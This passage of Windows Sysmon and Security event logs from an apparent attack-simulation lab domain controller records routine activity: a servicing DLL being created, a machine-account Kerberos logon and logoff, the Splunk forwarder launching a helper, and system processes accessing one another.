C:\\Windows\\SoftwareDistribution\\SIH\\stage\\eng\\siheng.dll\r\nCreationUtcTime: 2020-08-01 07:56:08.638","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:56:08.638","ProcessGuid":"{41C8662E-2017-5F25-0000-00108FE50500}","Image":"C:\\Windows\\System32\\sihclient.exe","TargetFilename":"C:\\Windows\\SoftwareDistribution\\SIH\\stage\\eng\\siheng.dll","CreationUtcTime":"2020-08-01 07:56:08.638","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76861,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The Network Setup Service service entered the stopped state.","param1":"Network Setup Service","param2":"stopped","EventReceivedTime":"2020-08-01 07:56:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220406,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6084A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6084a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:56:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220407,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6084A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50106\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6084a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50106","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:56:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220408,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6084A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6084a","LogonType":"3","EventReceivedTime":"2020-08-01 07:56:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.647\r\nProcessGuid: {41C8662E-2038-5F25-0000-001033090600}\r\nProcessId: 3912\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.647","ProcessGuid":"{41C8662E-2038-5F25-0000-001033090600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2038-5F25-0000-001033090600}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2038-5F25-0000-001033090600}","TargetProcessId":"3912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2038-5F25-0000-001033090600}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2038-5F25-0000-001033090600}","TargetProcessId":"3912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:40.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:40.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 